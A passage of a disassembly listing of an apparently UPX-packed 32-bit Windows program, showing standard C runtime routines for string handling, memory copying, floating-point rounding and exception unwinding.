[esp+4+arg_0] test edx, 3 jz short loc_41BFDB loc_41BFC8: ; CODE XREF: sub_41BFB0+29j mov cl, [edx] inc edx cmp cl, bl jz short loc_41BFA0 test cl, cl jz short loc_41C024 test edx, 3 jnz short loc_41BFC8 loc_41BFDB: ; CODE XREF: sub_41BFB0+16j or ebx, eax push edi mov eax, ebx shl ebx, 10h push esi or ebx, eax loc_41BFE6: ; CODE XREF: sub_41BFB0+61j ; sub_41BFB0+70j ... mov ecx, [edx] mov edi, 7EFEFEFFh mov eax, ecx mov esi, edi xor ecx, ebx add esi, eax add edi, ecx xor ecx, 0FFFFFFFFh xor eax, 0FFFFFFFFh xor ecx, edi xor eax, esi add edx, 4 and ecx, 81010100h jnz short loc_41C028 and eax, 81010100h jz short loc_41BFE6 and eax, 1010100h jnz short loc_41C022 and esi, 80000000h jnz short loc_41BFE6 loc_41C022: ; CODE XREF: sub_41BFB0+68j ; sub_41BFB0+81j ... pop esi pop edi loc_41C024: ; CODE XREF: sub_41BFB0+21j pop ebx xor eax, eax retn ; --------------------------------------------------------------------------- loc_41C028: ; CODE XREF: sub_41BFB0+5Aj mov eax, [edx-4] cmp al, bl jz short loc_41C065 test al, al jz short loc_41C022 cmp ah, bl jz short loc_41C05E test ah, ah jz short loc_41C022 shr eax, 10h cmp al, bl jz short loc_41C057 test al, al jz short loc_41C022 cmp ah, bl jz short loc_41C050 test ah, ah jz short loc_41C022 jmp short loc_41BFE6 ; --------------------------------------------------------------------------- loc_41C050: ; CODE XREF: sub_41BFB0+98j pop esi pop edi lea eax, [edx-1] pop ebx retn ; --------------------------------------------------------------------------- loc_41C057: ; CODE XREF: sub_41BFB0+90j lea eax, [edx-2] pop esi pop edi pop ebx retn ; --------------------------------------------------------------------------- loc_41C05E: ; CODE XREF: sub_41BFB0+85j lea eax, [edx-3] pop esi pop edi pop ebx retn ; --------------------------------------------------------------------------- loc_41C065: ; CODE XREF: sub_41BFB0+7Dj lea eax, [edx-4] pop esi pop edi pop ebx retn sub_41BFB0 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41C070 proc near ; CODE XREF: sub_401ACD+1AEp ; sub_401ACD+205p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov edx, [esp+arg_0] mov ecx, [esp+arg_4] test edx, 3 jnz short loc_41C0BC loc_41C080: ; CODE XREF: sub_41C070+3Cj ; sub_41C070+66j ... mov eax, [edx] cmp al, [ecx] jnz short loc_41C0B4 or al, al jz short loc_41C0B0 cmp ah, [ecx+1] jnz short loc_41C0B4 or ah, ah jz short loc_41C0B0 shr eax, 10h cmp al, [ecx+2] jnz short loc_41C0B4 or al, al jz short loc_41C0B0 cmp ah, [ecx+3] jnz short loc_41C0B4 add ecx, 4 add edx, 4 or ah, ah jnz short loc_41C080 mov edi, edi loc_41C0B0: ; CODE XREF: sub_41C070+18j ; sub_41C070+21j ... xor eax, eax retn ; --------------------------------------------------------------------------- align 4 loc_41C0B4: ; CODE XREF: sub_41C070+14j ; sub_41C070+1Dj ... sbb eax, eax shl eax, 1 inc eax retn ; --------------------------------------------------------------------------- align 4 loc_41C0BC: ; CODE XREF: sub_41C070+Ej test edx, 1 jz short loc_41C0D8 mov al, [edx] inc edx cmp al, [ecx] jnz short loc_41C0B4 inc ecx or al, al jz short loc_41C0B0 test edx, 2 jz short loc_41C080 loc_41C0D8: ; CODE XREF: sub_41C070+52j mov ax, [edx] add edx, 2 cmp al, [ecx] jnz short loc_41C0B4 or al, al jz short loc_41C0B0 cmp ah, [ecx+1] jnz short loc_41C0B4 or ah, ah jz short loc_41C0B0 add ecx, 2 jmp short loc_41C080 sub_41C070 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41C0F4 proc near ; CODE XREF: sub_401ACD+B5p ; sub_401ACD+D5p ... var_20 = byte ptr -20h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 20h push ebx push esi mov esi, [ebp+arg_4] push edi push 8 xor eax, eax pop ecx lea edi, [ebp+var_20] rep stosd push 7 pop edi loc_41C10D: ; CODE XREF: sub_41C0F4+32j mov dl, [esi] mov bl, 1 movzx ecx, dl mov eax, ecx and ecx, edi shr eax, 3 shl bl, cl lea eax, [ebp+eax+var_20] or [eax], bl inc esi test dl, dl jnz short loc_41C10D mov edx, [ebp+arg_0] test edx, edx jnz short loc_41C135 mov edx, ds:dword_4DB9A4 loc_41C135: ; CODE XREF: sub_41C0F4+39j ; sub_41C0F4+5Fj mov al, [edx] push 1 movzx esi, al mov ecx, esi pop ebx and ecx, edi shl ebx, cl shr esi, 3 mov cl, [ebp+esi+var_20] test bl, cl jz short loc_41C155 test al, al jz short loc_41C155 inc edx jmp short loc_41C135 ; --------------------------------------------------------------------------- loc_41C155: ; CODE XREF: sub_41C0F4+58j ; sub_41C0F4+5Cj mov ebx, edx loc_41C157: ; CODE XREF: sub_41C0F4+81j mov al, [edx] test al, al jz short loc_41C17B movzx esi, al mov ecx, esi push 1 and ecx, edi pop eax shl eax, cl shr esi, 3 mov cl, [ebp+esi+var_20] test al, cl jnz short loc_41C177 inc edx jmp short loc_41C157 ; --------------------------------------------------------------------------- loc_41C177: ; CODE XREF: sub_41C0F4+7Ej and byte ptr [edx], 0 inc edx loc_41C17B: ; CODE XREF: sub_41C0F4+67j mov eax, ebx pop edi sub eax, edx pop esi neg eax sbb eax, eax mov ds:dword_4DB9A4, edx and eax, ebx pop ebx leave retn sub_41C0F4 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41C190 proc near ; CODE XREF: sub_409A2D+1Cp ; sub_415221+19p var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 20h mov eax, [ebp+arg_0] push esi push [ebp+arg_C] mov [ebp+var_18], eax mov [ebp+var_20], eax mov eax, [ebp+arg_4] push [ebp+arg_8] mov [ebp+var_1C], eax lea eax, [ebp+var_20] mov [ebp+var_14], 42h push eax call sub_41F69F add esp, 0Ch dec [ebp+var_1C] mov esi, eax js short loc_41C1CE mov eax, [ebp+var_20] and byte ptr [eax], 0 jmp short loc_41C1DB ; --------------------------------------------------------------------------- loc_41C1CE: ; CODE XREF: sub_41C190+34j lea eax, [ebp+var_20] push eax push 0 call sub_41F58A pop ecx pop ecx loc_41C1DB: ; CODE XREF: sub_41C190+3Cj mov eax, esi pop esi leave retn sub_41C190 endp ; =============== S U B R O U T I N E ======================================= sub_41C1E0 proc near ; CODE XREF: sub_40AFEB+88p ; sub_40B64B+60p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch mov ecx, [esp+arg_8] push edi test ecx, ecx jz loc_41C294 mov edi, [esp+4+arg_0] push esi test edi, 3 push ebx jz short loc_41C20A loc_41C1FB: ; CODE XREF: sub_41C1E0+28j mov al, [edi] inc edi test al, al jz short loc_41C23B test edi, 3 jnz short loc_41C1FB loc_41C20A: ; CODE XREF: sub_41C1E0+19j ; sub_41C1E0+40j ... mov eax, [edi] mov edx, 7EFEFEFFh add edx, eax xor eax, 0FFFFFFFFh xor eax, edx add edi, 4 test eax, 81010100h jz short loc_41C20A mov eax, [edi-4] test al, al jz short loc_41C248 test ah, ah jz short loc_41C243 test eax, 0FF0000h jz short loc_41C23E test eax, 0FF000000h jnz short loc_41C20A loc_41C23B: ; CODE XREF: sub_41C1E0+20j dec edi jmp short loc_41C24B ; --------------------------------------------------------------------------- loc_41C23E: ; CODE XREF: sub_41C1E0+52j sub edi, 2 jmp short loc_41C24B ; --------------------------------------------------------------------------- loc_41C243: ; CODE XREF: sub_41C1E0+4Bj sub edi, 3 jmp short loc_41C24B ; --------------------------------------------------------------------------- loc_41C248: ; CODE XREF: sub_41C1E0+47j sub edi, 4 loc_41C24B: ; CODE XREF: sub_41C1E0+5Cj ; sub_41C1E0+61j ... mov esi, [esp+0Ch+arg_4] test esi, 3 jnz short loc_41C260 mov ebx, ecx shr ecx, 2 jnz short loc_41C2AC jmp short loc_41C27C ; --------------------------------------------------------------------------- loc_41C260: ; CODE XREF: sub_41C1E0+75j ; sub_41C1E0+93j mov dl, [esi] inc esi test dl, dl jz short loc_41C29A mov [edi], dl inc edi dec ecx jz short loc_41C290 test esi, 3 jnz short loc_41C260 mov ebx, ecx shr ecx, 2 jnz short loc_41C2AC loc_41C27C: ; CODE XREF: sub_41C1E0+7Ej ; sub_41C1E0+CAj mov ecx, ebx and ecx, 3 jz short loc_41C290 loc_41C283: ; CODE XREF: sub_41C1E0+AEj mov dl, [esi] inc esi mov [edi], dl inc edi test dl, dl jz short loc_41C292 dec ecx jnz short loc_41C283 loc_41C290: ; CODE XREF: sub_41C1E0+8Bj ; sub_41C1E0+A1j mov [edi], cl loc_41C292: ; CODE XREF: sub_41C1E0+ABj pop ebx pop esi loc_41C294: ; CODE XREF: sub_41C1E0+7j mov eax, [esp+4+arg_0] pop edi retn ; --------------------------------------------------------------------------- loc_41C29A: ; CODE XREF: sub_41C1E0+85j ; sub_41C1E0+E8j mov [edi], dl mov eax, [esp+0Ch+arg_0] pop ebx pop esi pop edi retn ; --------------------------------------------------------------------------- loc_41C2A4: ; CODE XREF: sub_41C1E0+E4j ; sub_41C1E0+FCj mov [edi], edx add edi, 4 dec ecx jz short loc_41C27C loc_41C2AC: ; CODE XREF: sub_41C1E0+7Cj ; sub_41C1E0+9Aj mov edx, 7EFEFEFFh mov eax, [esi] add edx, eax xor eax, 0FFFFFFFFh xor eax, edx mov edx, [esi] add esi, 4 test eax, 81010100h jz short loc_41C2A4 test dl, dl jz short loc_41C29A test dh, dh jz short loc_41C2F8 test edx, 0FF0000h jz short loc_41C2E8 test edx, 0FF000000h jnz short loc_41C2A4 mov [edi], edx mov eax, [esp+0Ch+arg_0] pop ebx pop esi pop edi retn ; --------------------------------------------------------------------------- loc_41C2E8: ; CODE XREF: sub_41C1E0+F4j mov [edi], dx xor edx, edx mov eax, [esp+0Ch+arg_0] mov [edi+2], dl pop ebx pop esi pop edi retn ; --------------------------------------------------------------------------- loc_41C2F8: ; CODE XREF: sub_41C1E0+ECj mov [edi], dx mov eax, [esp+0Ch+arg_0] pop ebx pop esi pop edi retn sub_41C1E0 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41C310 proc near ; CODE XREF: sub_40BFA4+15p ; sub_40BFA4+3Bp ... var_3A3BFFC0 = byte ptr -3A3BFFC0h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push edi push esi mov esi, [ebp+arg_4] mov ecx, [ebp+arg_8] mov edi, [ebp+arg_0] mov eax, ecx mov edx, ecx add eax, esi cmp edi, esi jbe short loc_41C330 cmp edi, eax jb loc_41C4A8 loc_41C330: ; CODE XREF: sub_41C310+16j test edi, 3 jnz short loc_41C34C shr ecx, 2 and edx, 3 cmp ecx, 8 jb short loc_41C36C rep movsd jmp off_41C458[edx*4] ; --------------------------------------------------------------------------- loc_41C34C: ; CODE XREF: sub_41C310+26j mov eax, edi mov edx, 3 sub ecx, 4 jb short loc_41C364 and eax, 3 add ecx, eax jmp dword ptr loc_41C36C+4[eax*4] ; --------------------------------------------------------------------------- loc_41C364: ; CODE XREF: sub_41C310+46j jmp dword ptr loc_41C468[ecx*4] ; --------------------------------------------------------------------------- align 4 loc_41C36C: ; CODE XREF: sub_41C310+31j ; sub_41C310+8Ej ... jmp off_41C3EC[ecx*4] ; --------------------------------------------------------------------------- align 4 dd offset loc_41C380 ; --------------------------------------------------------------------------- lodsb retn ; --------------------------------------------------------------------------- inc ecx add al, dl retn ; --------------------------------------------------------------------------- dw 41h ; --------------------------------------------------------------------------- loc_41C380: ; DATA XREF: sub_41C310+64o and edx, ecx mov al, [esi] mov [edi], al mov al, [esi+1] mov [edi+1], al mov al, [esi+2] shr ecx, 2 mov [edi+2], al add esi, 3 add edi, 3 cmp ecx, 8 jb short loc_41C36C rep movsd jmp off_41C458[edx*4] ; --------------------------------------------------------------------------- align 4 and edx, ecx mov al, [esi] mov [edi], al mov al, [esi+1] shr ecx, 2 mov [edi+1], al add esi, 2 add edi, 2 cmp ecx, 8 jb short loc_41C36C rep movsd jmp off_41C458[edx*4] ; --------------------------------------------------------------------------- align 10h and edx, ecx mov al, [esi] mov [edi], al inc esi shr ecx, 2 inc edi cmp ecx, 8 jb short loc_41C36C rep movsd jmp off_41C458[edx*4] ; --------------------------------------------------------------------------- align 4 off_41C3EC dd offset loc_41C44F ; DATA XREF: sub_41C310:loc_41C36Cr dd offset loc_41C43C dd offset loc_41C434 dd offset loc_41C42C dd offset loc_41C424 dd offset loc_41C41C dd offset loc_41C414 dd offset loc_41C40C ; --------------------------------------------------------------------------- loc_41C40C: ; CODE XREF: sub_41C310:loc_41C36Cj ; DATA XREF: sub_41C310+F8o mov eax, [esi+ecx*4-1Ch] mov [edi+ecx*4-1Ch], eax loc_41C414: ; CODE XREF: sub_41C310:loc_41C36Cj ; DATA XREF: sub_41C310+F4o mov eax, [esi+ecx*4-18h] mov [edi+ecx*4-18h], eax loc_41C41C: ; CODE XREF: sub_41C310:loc_41C36Cj ; DATA XREF: sub_41C310+F0o mov eax, [esi+ecx*4-14h] mov [edi+ecx*4-14h], eax loc_41C424: ; CODE XREF: sub_41C310:loc_41C36Cj ; DATA XREF: sub_41C310+ECo mov eax, [esi+ecx*4-10h] mov [edi+ecx*4-10h], eax loc_41C42C: ; CODE XREF: sub_41C310:loc_41C36Cj ; DATA XREF: sub_41C310+E8o mov eax, [esi+ecx*4-0Ch] mov [edi+ecx*4-0Ch], eax loc_41C434: ; CODE XREF: sub_41C310:loc_41C36Cj ; DATA XREF: sub_41C310+E4o mov eax, [esi+ecx*4-8] mov [edi+ecx*4-8], eax loc_41C43C: ; CODE XREF: sub_41C310:loc_41C36Cj ; DATA XREF: sub_41C310+E0o mov eax, [esi+ecx*4-4] mov [edi+ecx*4-4], eax lea eax, ds:0[ecx*4] add esi, eax add edi, eax loc_41C44F: ; CODE XREF: sub_41C310:loc_41C36Cj ; DATA XREF: sub_41C310:off_41C3ECo jmp off_41C458[edx*4] ; --------------------------------------------------------------------------- align 4 off_41C458 dd offset loc_41C468 ; DATA XREF: sub_41C310+35r ; sub_41C310+92r ... dd offset loc_41C470 dd offset loc_41C47C dd offset loc_41C490 ; --------------------------------------------------------------------------- loc_41C468: ; CODE XREF: sub_41C310+35j ; sub_41C310+92j ... mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 10h loc_41C470: ; CODE XREF: sub_41C310+35j ; sub_41C310+92j ... mov al, [esi] mov [edi], al mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 4 loc_41C47C: ; CODE XREF: sub_41C310+35j ; sub_41C310+92j ... mov al, [esi] mov [edi], al mov al, [esi+1] mov [edi+1], al mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 10h loc_41C490: ; CODE XREF: sub_41C310+35j ; sub_41C310+92j ... mov al, [esi] mov [edi], al mov al, [esi+1] mov [edi+1], al mov al, [esi+2] mov [edi+2], al mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 4 loc_41C4A8: ; CODE XREF: sub_41C310+1Aj lea esi, [ecx+esi-4] lea edi, [ecx+edi-4] test edi, 3 jnz short loc_41C4DC shr ecx, 2 and edx, 3 cmp ecx, 8 jb short loc_41C4D0 std rep movsd cld jmp off_41C5F0[edx*4] ; --------------------------------------------------------------------------- align 10h loc_41C4D0: ; CODE XREF: sub_41C310+1B1j ; sub_41C310+208j ... neg ecx jmp dword ptr loc_41C59F+1[ecx*4] ; --------------------------------------------------------------------------- align 4 loc_41C4DC: ; CODE XREF: sub_41C310+1A6j mov eax, edi mov edx, 3 cmp ecx, 4 jb short loc_41C4F4 and eax, 3 sub ecx, eax jmp dword ptr loc_41C4F4+4[eax*4] ; --------------------------------------------------------------------------- loc_41C4F4: ; CODE XREF: sub_41C310+1D6j ; DATA XREF: sub_41C310+1DDr jmp off_41C5F0[ecx*4] ; --------------------------------------------------------------------------- align 4 or ch, al inc ecx add [eax], ch lds eax, [ecx+0] push eax lds eax, [ecx+0] mov al, [esi+3] and edx, ecx mov [edi+3], al dec esi shr ecx, 2 dec edi cmp ecx, 8 jb short loc_41C4D0 std rep movsd cld jmp off_41C5F0[edx*4] ; --------------------------------------------------------------------------- align 4 mov al, [esi+3] and edx, ecx mov [edi+3], al mov al, [esi+2] shr ecx, 2 mov [edi+2], al sub esi, 2 sub edi, 2 cmp ecx, 8 jb short loc_41C4D0 std rep movsd cld jmp off_41C5F0[edx*4] ; --------------------------------------------------------------------------- align 10h mov al, [esi+3] and edx, ecx mov [edi+3], al mov al, [esi+2] mov [edi+2], al mov al, [esi+1] shr ecx, 2 mov [edi+1], al sub esi, 3 sub edi, 3 cmp ecx, 8 jb loc_41C4D0 std rep movsd cld jmp off_41C5F0[edx*4] ; --------------------------------------------------------------------------- align 4 movsb lds eax, [ecx+0] lodsb lds eax, [ecx+0] mov ah, 0C5h inc ecx add [ebp+eax*8-3A3BFFBFh], bh inc ecx add ah, cl lds eax, [ecx+0] aam 0C5h inc ecx loc_41C59F: ; DATA XREF: sub_41C310+1C2r add bh, ah lds eax, [ecx+0] mov eax, [esi+ecx*4+1Ch] mov [edi+ecx*4+1Ch], eax mov eax, [esi+ecx*4+18h] mov [edi+ecx*4+18h], eax mov eax, [esi+ecx*4+14h] mov [edi+ecx*4+14h], eax mov eax, [esi+ecx*4+10h] mov [edi+ecx*4+10h], eax mov eax, [esi+ecx*4+0Ch] mov [edi+ecx*4+0Ch], eax mov eax, [esi+ecx*4+8] mov [edi+ecx*4+8], eax mov eax, [esi+ecx*4+4] mov [edi+ecx*4+4], eax lea eax, ds:0[ecx*4] add esi, eax add edi, eax loc_41C5E7: ; CODE XREF: sub_41C310+1C2j jmp off_41C5F0[edx*4] ; --------------------------------------------------------------------------- align 10h off_41C5F0 dd offset loc_41C600 ; DATA XREF: sub_41C310+1B7r ; sub_41C310:loc_41C4F4r ... dd offset loc_41C608 dd offset loc_41C618 dd offset loc_41C62C ; --------------------------------------------------------------------------- loc_41C600: ; CODE XREF: sub_41C310+1B7j ; sub_41C310:loc_41C4F4j ... mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 4 loc_41C608: ; CODE XREF: sub_41C310+1B7j ; sub_41C310:loc_41C4F4j ... mov al, [esi+3] mov [edi+3], al mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 4 loc_41C618: ; CODE XREF: sub_41C310+1B7j ; sub_41C310:loc_41C4F4j ... mov al, [esi+3] mov [edi+3], al mov al, [esi+2] mov [edi+2], al mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 4 loc_41C62C: ; CODE XREF: sub_41C310+1B7j ; sub_41C310:loc_41C4F4j ... mov al, [esi+3] mov [edi+3], al mov al, [esi+2] mov [edi+2], al mov al, [esi+1] mov [edi+1], al mov eax, [ebp+arg_0] pop esi pop edi leave retn sub_41C310 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41C645 proc near ; CODE XREF: sub_40BFEC+40p ; UPX0:0040E2A0p ... var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = byte ptr 10h push ebp mov ebp, esp sub esp, 20h mov eax, [ebp+arg_0] mov [ebp+var_14], 49h push eax mov [ebp+var_18], eax mov [ebp+var_20], eax call sub_41AFE0 mov [ebp+var_1C], eax lea eax, [ebp+arg_8] push eax lea eax, [ebp+var_20] push [ebp+arg_4] push eax call sub_420510 add esp, 10h leave retn sub_41C645 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_41C679(double) sub_41C679 proc near ; CODE XREF: sub_40D031+38p var_24 = qword ptr -24h var_18 = qword ptr -18h var_8 = qword ptr -8 arg_0 = qword ptr 8 push ebp mov ebp, esp push ecx push ecx push ebx push esi mov esi, 0FFFFh push esi push dword_43A970 call sub_4217E9 fld [ebp+arg_0] pop ecx mov ebx, eax mov eax, dword ptr [ebp+arg_0+6] pop ecx push ecx and ax, 7FF0h push ecx cmp ax, 7FF0h fstp [esp+18h+var_18] jnz short loc_41C6FF call sub_4216B1 pop ecx test eax, eax pop ecx jle short loc_41C6E2 cmp eax, 2 jle short loc_41C6D4 cmp eax, 3 jnz short loc_41C6E2 fld [ebp+arg_0] push ebx push ecx ; int push ecx fstp qword ptr [esp] push 0Bh ; double call sub_420FC1 add esp, 10h jmp short loc_41C744 ; --------------------------------------------------------------------------- loc_41C6D4: ; CODE XREF: sub_41C679+3Fj push esi push ebx call sub_4217E9 fld [ebp+arg_0] pop ecx pop ecx jmp short loc_41C744 ; --------------------------------------------------------------------------- loc_41C6E2: ; CODE XREF: sub_41C679+3Aj ; sub_41C679+44j fld [ebp+arg_0] fadd dbl_427710 push ebx push ecx ; double push ecx fstp qword ptr [esp] fld [ebp+arg_0] push ecx push ecx fstp [esp+24h+var_24] push 0Bh push 8 jmp short loc_41C73C ; --------------------------------------------------------------------------- loc_41C6FF: ; CODE XREF: sub_41C679+2Fj call sub_421676 fstp [ebp+var_8] fld [ebp+var_8] fcomp [ebp+arg_0] pop ecx pop ecx fnstsw ax sahf jnz short loc_41C722 loc_41C714: ; CODE XREF: sub_41C679+ACj push esi push ebx call sub_4217E9 fld [ebp+var_8] pop ecx pop ecx jmp short loc_41C744 ; --------------------------------------------------------------------------- loc_41C722: ; CODE XREF: sub_41C679+99j test bl, 20h jnz short loc_41C714 fld [ebp+var_8] push ebx ; int push ecx push ecx ; double fstp qword ptr [esp] fld [ebp+arg_0] push ecx push ecx ; double fstp [esp+24h+var_24] push 0Bh ; int push 10h ; int loc_41C73C: ; CODE XREF: sub_41C679+84j call sub_421014 add esp, 1Ch loc_41C744: ; CODE XREF: sub_41C679+59j ; sub_41C679+67j ... pop esi pop ebx leave retn sub_41C679 endp ; =============== S U B R O U T I N E ======================================= sub_41C748 proc near ; CODE XREF: sub_41B784+9p ; sub_4218B2+21p ; DATA XREF: ... call sub_41C760 call sub_4218B2 mov ds:dword_4DB9AC, eax call sub_421862 fnclex retn sub_41C748 endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= sub_41C760 proc near ; CODE XREF: sub_41C748p mov eax, offset sub_421CA0 mov off_43CF84, offset sub_421935 mov off_43CF80, eax mov off_43CF88, offset sub_42199B mov off_43CF8C, offset sub_4218DB mov off_43CF90, offset sub_421983 mov off_43CF94, eax retn sub_41C760 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41C798 proc near ; CODE XREF: sub_40D031+1Bp ; sub_40D031+44p ... var_C = qword ptr -0Ch var_4 = word ptr -4 var_2 = word ptr -2 push ebp mov ebp, esp add esp, 0FFFFFFF4h fstcw [ebp+var_2] wait mov ax, [ebp+var_2] or ah, 0Ch mov [ebp+var_4], ax fldcw [ebp+var_4] fistp [ebp+var_C] fldcw [ebp+var_2] mov eax, dword ptr [ebp+var_C] mov edx, dword ptr [ebp+var_C+4] leave retn sub_41C798 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_41C7BF(double) sub_41C7BF proc near ; CODE XREF: sub_40D07D+82p ; sub_40D99C+3A1p var_24 = qword ptr -24h var_18 = qword ptr -18h var_8 = qword ptr -8 arg_0 = qword ptr 8 push ebp mov ebp, esp push ecx push ecx push ebx push esi mov esi, 0FFFFh push esi push dword_43A988 call sub_4217E9 fld [ebp+arg_0] pop ecx mov ebx, eax mov eax, dword ptr [ebp+arg_0+6] pop ecx push ecx and ax, 7FF0h push ecx cmp ax, 7FF0h fstp [esp+18h+var_18] jnz short loc_41C845 call sub_4216B1 pop ecx test eax, eax pop ecx jle short loc_41C828 cmp eax, 2 jle short loc_41C81A cmp eax, 3 jnz short loc_41C828 fld [ebp+arg_0] push ebx push ecx ; int push ecx fstp qword ptr [esp] push 0Ch ; double call sub_420FC1 add esp, 10h jmp short loc_41C88A ; --------------------------------------------------------------------------- loc_41C81A: ; CODE XREF: sub_41C7BF+3Fj push esi push ebx call sub_4217E9 fld [ebp+arg_0] pop ecx pop ecx jmp short loc_41C88A ; --------------------------------------------------------------------------- loc_41C828: ; CODE XREF: sub_41C7BF+3Aj ; sub_41C7BF+44j fld [ebp+arg_0] fadd dbl_427710 push ebx push ecx ; double push ecx fstp qword ptr [esp] fld [ebp+arg_0] push ecx push ecx fstp [esp+24h+var_24] push 0Ch push 8 jmp short loc_41C882 ; --------------------------------------------------------------------------- loc_41C845: ; CODE XREF: sub_41C7BF+2Fj call sub_421676 fstp [ebp+var_8] fld [ebp+var_8] fcomp [ebp+arg_0] pop ecx pop ecx fnstsw ax sahf jnz short loc_41C868 loc_41C85A: ; CODE XREF: sub_41C7BF+ACj push esi push ebx call sub_4217E9 fld [ebp+var_8] pop ecx pop ecx jmp short loc_41C88A ; --------------------------------------------------------------------------- loc_41C868: ; CODE XREF: sub_41C7BF+99j test bl, 20h jnz short loc_41C85A fld [ebp+var_8] push ebx ; int push ecx push ecx ; double fstp qword ptr [esp] fld [ebp+arg_0] push ecx push ecx ; double fstp [esp+24h+var_24] push 0Ch ; int push 10h ; int loc_41C882: ; CODE XREF: sub_41C7BF+84j call sub_421014 add esp, 1Ch loc_41C88A: ; CODE XREF: sub_41C7BF+59j ; sub_41C7BF+67j ... pop esi pop ebx leave retn sub_41C7BF endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41C88E proc near ; CODE XREF: sub_422111+71p var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push ebx push esi push edi mov eax, [ebp+arg_4] add eax, 0Ch mov [ebp+var_4], eax mov ebx, large fs:0 mov eax, [ebx] mov large fs:0, eax mov eax, [ebp+arg_0] mov ebx, [ebp+arg_4] mov esp, [ebx-4] mov ebp, [ebp+var_4] jmp eax sub_41C88E endp ; --------------------------------------------------------------------------- pop edi pop esi pop ebx leave retn 8 ; =============== S U B R O U T I N E ======================================= sub_41C8C2 proc near ; CODE XREF: sub_4222C2+199p ; sub_422486+3Ep arg_4 = dword ptr 8 pop eax pop ecx xchg eax, [esp-8+arg_4] jmp eax sub_41C8C2 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_41C8C9 proc near ; CODE XREF: sub_4222C2+17Fp arg_4 = dword ptr 8 pop eax pop ecx xchg eax, [esp-8+arg_4] jmp eax sub_41C8C9 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41C8D0 proc near ; CODE XREF: sub_41CA82+5Cp ; sub_422111:loc_422142p var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push ecx push ebx push esi push edi mov eax, large fs:0 mov [ebp+var_8], eax mov [ebp+var_4], offset loc_41C8F8 push 0 push [ebp+arg_4] push [ebp+var_4] push [ebp+arg_0] call sub_42675C ; RtlUnwind loc_41C8F8: ; DATA XREF: sub_41C8D0+11o mov eax, [ebp+arg_4] mov eax, [eax+4] and al, 0FDh mov ecx, [ebp+arg_4] mov [ecx+4], eax mov eax, large fs:0 mov ebx, [ebp+var_8] mov [ebx], eax mov large fs:0, ebx pop edi pop esi pop ebx leave retn 8 sub_41C8D0 endp ; --------------------------------------------------------------------------- loc_41C91F: ; CODE XREF: UPX0:00426DFCj ; UPX0:00426E19j ... push ebp mov ebp, esp sub esp, 4 push ebx push esi push edi cld mov [ebp-4], eax xor eax, eax push eax push eax push eax push dword ptr [ebp-4] push dword ptr [ebp+14h] push dword ptr [ebp+10h] push dword ptr [ebp+0Ch] push dword ptr [ebp+8] call sub_421D16 add esp, 20h mov [ebp+14h], eax pop edi pop esi pop ebx mov eax, [ebp+14h] mov esp, ebp pop ebp retn ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41C955 proc near ; CODE XREF: sub_42218C+73p var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 14h mov eax, [ebp+arg_4] and [ebp+var_14], 0 mov ecx, [ebp+arg_0] mov [ebp+var_C], eax mov eax, [ebp+arg_C] mov [ebp+var_10], offset sub_41C9A9 inc eax mov [ebp+var_8], ecx mov [ebp+var_4], eax mov eax, large fs:0 mov [ebp+var_14], eax lea eax, [ebp+var_14] mov large fs:0, eax push [ebp+arg_10] push ecx push [ebp+arg_8] call sub_422510 mov ecx, eax mov eax, [ebp+var_14] mov large fs:0, eax mov eax, ecx leave retn sub_41C955 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41C9A9 proc near ; DATA XREF: sub_41C955+16o arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp cld mov eax, [ebp+arg_4] push 0 push eax push dword ptr [eax+10h] push dword ptr [eax+8] push 0 push 